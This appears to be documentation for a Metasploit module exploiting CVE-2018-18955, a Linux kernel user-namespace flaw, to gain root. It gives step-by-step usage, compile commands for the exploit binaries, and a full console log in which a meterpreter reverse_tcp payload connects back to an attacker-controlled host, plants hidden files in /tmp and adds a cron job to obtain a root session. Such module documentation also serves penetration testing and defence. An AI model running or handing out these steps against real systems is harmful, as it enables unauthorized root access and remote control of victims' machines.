## Description

  This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,
  and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user
  namespaces and kernel uid/gid mappings allow elevation to root
  (CVE-2018-18955).

  The target system must have unprivileged user namespaces enabled and
  the newuidmap and newgidmap helpers installed (from uidmap package).


## Vulnerable Application

  This module has been tested successfully on:

  * Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64
  * Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64)
  * Linux Mint 19 kernel 4.15.0-20-generic (x86_64)
  * Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/nested_namespace_idmap_limit_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)

  **COMPILE**

  Options: `Auto` `True` `False` (default: `Auto`)

  Whether the exploit should be live compiled with `gcc` on the target system,
  or uploaded as a pre-compiled binary.

  `Auto` will first determine if `gcc` is installed to compile live on the system,
  and fall back to uploading pre-compiled binaries.


## Compiled Executables
  
The module makes use of two pre-compiled exploit executables:

  * `subuid_shell`
  * `subshell`

These are used when `gcc` is not available on the target host for live compiling,
or `COMPILE` is set to `False`.

The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).
  
```bash
./i486-linux-musl-gcc -o subshell.out -s -pie -static subshell.c 
./i486-linux-musl-gcc -o subuid_shell.out -s -pie -static subuid_shell.c 
```


## Scenarios

### Fedora Workstation 28 (verbose output)

  ```
  msf > use exploit/linux/local/nested_namespace_idmap_limit_priv_esc 
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > set verbose true
  verbose => true
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > check

  [+] Unprivileged user namespaces are permitted
  [+] /usr/bin/newuidmap is set-uid
  [+] /usr/bin/newgidmap is set-uid
  [+] Kernel version 4.16.3-301.fc28.x86_64 appears to be vulnerable
  [*] The target appears to be vulnerable.
  msf exploit(linux/local/nested_namespace_idmap_limit_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [+] Unprivileged user namespaces are permitted
  [+] /usr/bin/newuidmap is set-uid
  [+] /usr/bin/newgidmap is set-uid
  [+] Kernel version 4.16.3-301.fc28.x86_64 appears to be vulnerable
  [+] gcc is installed
  [*] Live compiling exploit on system...
  [*] Writing '/tmp/.LOren.c' (6058 bytes) ...
  [*] Writing '/tmp/.C9dWgG.c' (1604 bytes) ...
  [*] Writing '/tmp/.6syapMd72' (367 bytes) ...
  [*] Adding cron job...
  [*] [.] starting
  [*] [.] setting up namespace
  [*] [~] done, namespace sandbox set up
  [*] [.] mapping subordinate ids
  [*] [.] subuid: 100000
  [*] [.] subgid: 100000
  [*] [~] done, mapped subordinate ids
  [*] [.] executing subshell
  [+] Success. Waiting for job to run (may take a minute)...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (816260 bytes) to 172.16.191.137
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.137:39150) at 2018-11-24 19:28:02 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : localhost.localdomain
  OS           : Fedora 28 (Linux 4.16.3-301.fc28.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

